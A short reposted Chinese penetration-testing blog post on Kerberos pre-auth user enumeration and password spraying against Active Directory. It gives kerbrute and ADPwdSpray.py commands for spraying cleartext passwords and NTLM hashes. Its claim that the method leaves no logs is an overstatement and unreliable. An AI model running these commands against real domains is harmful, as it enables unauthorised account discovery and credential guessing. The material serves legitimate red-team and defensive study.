大家好,又见面了,我是全栈君,祝每个程序员都可以多学几门语言。
域渗透之 pre-auth用户枚举
适用场景与优点
适用于在域外对域用户进行用户枚举和爆破
使用Kerberos pre-auth bruteforcing的速度快,并且不会产生日志。
适用场景:
在没有域用户的口令,所以无法通过LDAP协议枚举出所有域用户,可以使用这种方式来验证用户是否存在
用户存在,抓包内容,这里借用三好师傅的图
用户不存在,抓包内容如下
用户枚举
https://github.com/ropnop/kerbrute
https://github.com/3gstudent/pyKerbrute
kerbrute_windows_amd64.exe userenum --dc 192.168.22.135 -d nncm 1.txt
密码喷射
口令正确抓包如下
口令错误抓包如下
kerbrute_windows_amd64.exe passwordspray --dc 192.168.37.131 -d nncm user.txt xx110110.
//针对明文进行喷洒
python2 ADPwdSpray.py 10.1.1.1 hack.com user.txt clearpassword 123.com tcp
//针对哈希进行喷洒
python2 ADPwdSpray.py 10.1.1.1 hack.com user.txt ntlmhash afffeba176210fad4628f0524bfe1942 udp
Reference
渗透技巧-通过Kerberos-pre-auth进行用户枚举和口令爆破
版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请联系我们举报,一经查实,本站将立刻删除。
发布者:全栈程序员-站长,转载请注明出处:https://javaforall.net/119848.html原文链接:https://javaforall.net
